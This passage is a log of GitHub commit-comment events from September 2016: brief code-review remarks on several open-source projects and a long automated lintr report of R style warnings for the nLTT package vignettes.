{"id":"4560504397","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014306,"position":207,"line":207,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:18:17Z","updated_at":"2016-09-14T08:18:17Z","body":"nice :)"}},"created_at":"2016-09-14T08:18:17Z"}
{"id":"4560504647","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19014307,"position":346,"line":131,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-14T08:18:19Z","updated_at":"2016-09-14T08:18:19Z","body":"set constraints on the parameter: mandatory and string"}},"created_at":"2016-09-14T08:18:19Z"}
{"id":"4560504891","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014309,"position":224,"line":224,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:18:22Z","updated_at":"2016-09-14T08:18:22Z","body":"done"}},"created_at":"2016-09-14T08:18:22Z"}
{"id":"4560508166","type":"CommitCommentEvent","actor":{"login":"quicksketch"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014321,"position":9,"line":696,"path":"core/includes/common.inc","commit_id":"7b0d95bb42ad31e6b09d6e906283e9069b9340e5","created_at":"2016-09-14T08:19:11Z","updated_at":"2016-09-14T08:19:11Z","body":"Fixed 'referer' to be 'HTTP_REFERER' in https://github.com/backdrop/backdrop/commit/9a003450c5004390539a38295c751f693a3ea6a3."}},"created_at":"2016-09-14T08:19:11Z"}
{"id":"4560509988","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19014323,"position":null,"line":null,"path":null,"commit_id":"596392165523ca49ae4acb34d62bdac6eb414537","created_at":"2016-09-14T08:19:35Z","updated_at":"2016-09-14T08:19:35Z","body":"Very nice ;)"}},"created_at":"2016-09-14T08:19:35Z"}
{"id":"4560511997","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"grails/grails-views"},"payload":{"comment":{"id":19014325,"position":21,"line":29,"path":"json/src/main/groovy/grails/plugin/json/view/api/internal/DefaultJsonApiViewHelper.groovy","commit_id":"a7ba08430da25ccc5e3a17bec1370221853612bd","created_at":"2016-09-14T08:20:03Z","updated_at":"2016-09-14T08:20:03Z","body":"If this is something that is needed from Spring, then a better approach is to define it as autowired in the template engine:\r\n\r\nhttps://github.com/grails/grails-views/blob/master/core/src/main/groovy/grails/views/ResolvableGroovyTemplateEngine.groovy#L144\r\n\r\nAnd then inject it into the view template:\r\n\r\nhttps://github.com/grails/grails-views/blob/master/core/src/main/groovy/grails/views/ResolvableGroovyTemplateEngine.groovy#L198\r\n\r\nUsing `Holders` should be avoided and if I could I would delete that class altogether, unfortunately it is still needed for some corner cases of the framework"}},"created_at":"2016-09-14T08:20:03Z"}
{"id":"4560513533","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"grails/grails-views"},"payload":{"comment":{"id":19014327,"position":66,"line":184,"path":"json/src/main/groovy/grails/plugin/json/view/api/internal/DefaultJsonApiViewHelper.groovy","commit_id":"a7ba08430da25ccc5e3a17bec1370221853612bd","created_at":"2016-09-14T08:20:24Z","updated_at":"2016-09-14T08:20:24Z","body":"Do not use `Holders` or reference the applicationContext directly please"}},"created_at":"2016-09-14T08:20:24Z"}
{"id":"4560515197","type":"CommitCommentEvent","actor":{"login":"graemerocher"},"repo":{"name":"grails/grails-views"},"payload":{"comment":{"id":19014331,"position":9,"line":12,"path":"json/src/test/groovy/grails/plugin/json/view/api/JsonApiSpec.groovy","commit_id":"a7ba08430da25ccc5e3a17bec1370221853612bd","created_at":"2016-09-14T08:20:47Z","updated_at":"2016-09-14T08:20:47Z","body":"is this needed?"}},"created_at":"2016-09-14T08:20:47Z"}
{"id":"4560516760","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":19014337,"position":49,"line":49,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-14T08:21:11Z","updated_at":"2016-09-14T08:21:11Z","body":"Need to check with @smiklosovic . Do you remember why in this line https://github.com/arquillian/arquillian-governor/blob/master/jira/src/main/java/org/arquillian/extension/governor/jira/impl/JiraTestExecutionDecider.java#L108 uses GovernorRegistry instead of getting the annotation from the `event.getTestMethod` and `event.getTestClass` ? "}},"created_at":"2016-09-14T08:21:11Z"}
{"id":"4560517113","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014338,"position":240,"line":240,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:21:16Z","updated_at":"2016-09-14T08:21:16Z","body":"if no regionId it can be empty because for example netherlands does not have a region field in apple details."}},"created_at":"2016-09-14T08:21:16Z"}
{"id":"4560519114","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19014341,"position":null,"line":null,"path":null,"commit_id":"ebd8646dcd6d75c6889e61d5edf30a10fde666e4","created_at":"2016-09-14T08:21:39Z","updated_at":"2016-09-14T08:21:39Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:9:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_get_average_nltt.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L14) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L24) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:32:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L32) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:33:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:36:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:38:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L38) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:41:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L41) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L46) *style:* **lines should not be more than 80 characters.**\n```r\n​newick2 <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L52) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:54:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L54) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:62:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L62) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:70:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L70) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L71) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny1), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:73:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L73) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L74) *style:* **lines should not be more than 80 characters.**\n```r\n​nLTT::stretch_nltt_matrix(nLTT::get_phylogeny_nltt_matrix(phylogeny2), dt = 0.20, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:76:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L76) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:79:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L79) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:81:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_average_nltt.R#L81) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:4:9:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L17) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L28) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:28:53:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L28) *style:* **Commas should always have a space after.**\n```r\n​qplot(time, N, data = df, geom = \"step\", ylim = c(0,1), direction = \"vh\", main = \"NLTT plot of phylogeny 1\")\n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:30:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L30) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L32) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:34:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L34) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/ebd8646dcd6d75c6889e61d5edf30a10fde666e4/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 